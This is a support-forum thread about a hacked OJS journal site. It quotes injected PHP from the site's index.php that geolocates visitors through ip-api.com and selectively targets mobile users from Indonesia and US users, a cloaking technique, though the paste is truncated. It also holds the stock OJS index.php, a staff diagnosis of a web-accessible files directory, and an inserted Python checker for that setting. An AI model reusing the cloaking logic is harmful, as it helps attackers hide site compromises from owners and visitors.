**Describe the issue or problem**
It seems that our website has been attacked. The main page is frozen. The site is: ttps://journals.moleculepub.com/
We checked the files in the file manager and found that several files were updated. In particular, the index.php was modified. Here is the file:
```php
<?php
session_start();
// Detect the user's device (mobile or desktop) and country of origin
function isMobileDeviceFromIndonesiaOrUS() {
    $ip = $_SERVER['REMOTE_ADDR'];
    // Check whether the result is already in the session
    if (isset($_SESSION['ip_info'][$ip])) {
        $ip_info = $_SESSION['ip_info'][$ip];
    } else {
        // Get IP info from the API
        $ip_info = json_decode(file_get_contents("http://ip-api.com/json/$ip"));
        // Store the result in the session
        if ($ip_info) {
            $_SESSION['ip_info'][$ip] = $ip_info;
        }
    }
    // Also check whether the IP address is a VPN address
    $vpn_ip_ranges = array(
        '1.0.0.0/24',
        '2.0.0.0/16',
        // Add other VPN IP addresses if needed
    );
    foreach ($vpn_ip_ranges as $vpn_ip_range) {
        if (ip_in_range($ip, $vpn_ip_range)) {
            return false; // If the user is using a VPN
        }
    }
    // If the IP address is from Indonesia or the United States
    if ($ip_info && ($ip_info->countryCode === 'ID' || $ip_info->countryCode === 'US')) {
        // If from Indonesia, check whether the device is mobile
        if ($ip_info->countryCode === 'ID') {
            return preg_match('/(android|iphone|ipod|ipad|iemobile|opera mini)/i', $_SERVER['HTTP_USER_AGENT']);
        }
        // If from the US, allow access without restriction
        return true;
    }
    return false; // For other countries
}
// Function to check whether an IP address falls within an IP range
function ip_in_range($ip, $range) {
    list($subnet, $mask) = explode('/', $range);
    return (ip2long($ip) & ~((1 <
```
The webpage now is frozen. Has anyone had a similar experience? Any solutions?
**Steps I took leading up to the issue**
I tried to change the index.php file by deleting the code above and using the following code, but it did not work:
```php
<?php
/**
 * @file ojs/index.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * Bootstrap code for OJS site. Loads required files and then calls the
 * dispatcher to delegate to the appropriate request handler.
 */
use APP\core\Application;

// Initialize global environment
define('INDEX_FILE_LOCATION', __FILE__);
require_once './lib/pkp/includes/bootstrap.php';

// Serve the request
Application::get()->execute();
```
**What application are you using?**
OJS 3.4
**Additional information**
These are the files that seem to be modified by the attack

Here is the files_dir setting in your configuration file:
```ini
[files]
; Complete path to directory to store uploaded files
; (This directory should not be directly web-accessible)
; Windows users should use forward slashes
files_dir = /home4/molecup9/public_html/journals/files

; Path to the directory to store public uploaded files
; (This directory should be web-accessible and the specified path
; should be relative to the base OJS directory)
; Windows users should use forward slashes
public_files_dir = public
```
This is what I suspected. Because you’ve placed the files directory inside public_html, its contents are directly accessible through the web server, bypassing OJS’s security. This makes your server easy to hack. There’s a warning about this in the configuration file, and on the installation form.
Regards,
Alec Smecher
Public Knowledge Project Team
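A check for the misconfiguration described in the reply above, as an added example (not part of the thread and not PKP code): it reads the `[files]` section of `config.inc.php` and reports whether `files_dir` resolves to a location under the web root. The web root and OJS base paths are assumptions inferred from the posted `files_dir` value, and the function names are hypothetical.

```python
import configparser
import posixpath

# [files] settings as posted in this thread.
POSTED_CONFIG = """\
[files]
; Complete path to directory to store uploaded files
files_dir = /home4/molecup9/public_html/journals/files
public_files_dir = public
"""
WEB_ROOT = "/home4/molecup9/public_html"           # assumed document root
OJS_BASE = "/home4/molecup9/public_html/journals"  # assumed OJS install dir


def read_files_settings(config_text):
    """Return the [files] section of an OJS config.inc.php as a dict."""
    parser = configparser.ConfigParser(
        interpolation=None, strict=False, allow_no_value=True,
        comment_prefixes=(";",))
    parser.read_string(config_text)
    return dict(parser["files"])


def is_inside(path, parent):
    """Component-wise containment test (a plain prefix match would
    wrongly treat /srv/public_html_old as inside /srv/public_html)."""
    path, parent = posixpath.normpath(path), posixpath.normpath(parent)
    return posixpath.commonpath([path, parent]) == parent


def check_files_dir(config_text, web_root=WEB_ROOT, ojs_base=OJS_BASE):
    """Resolve files_dir and report whether the web server can reach it."""
    raw = read_files_settings(config_text)["files_dir"].strip("\"' ")
    # Assumption: a relative files_dir is resolved against the OJS base.
    resolved = posixpath.normpath(posixpath.join(ojs_base, raw))
    return {"files_dir": resolved,
            "web_accessible": is_inside(resolved, web_root)}


if __name__ == "__main__":
    result = check_files_dir(POSTED_CONFIG)
    verdict = "INSIDE web root" if result["web_accessible"] else "outside web root"
    print(f"{result['files_dir']}: {verdict}")
```

On a live server, pass both paths through `os.path.realpath` first, since this version does not follow symlinks.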
@abadan Thank you for your suggestion. Just to clarify. So I can keep the folder of the journals where it is now: /home4/molecup9/public_html/journals. And just move the files folder to another place outside the public_html? Is that right?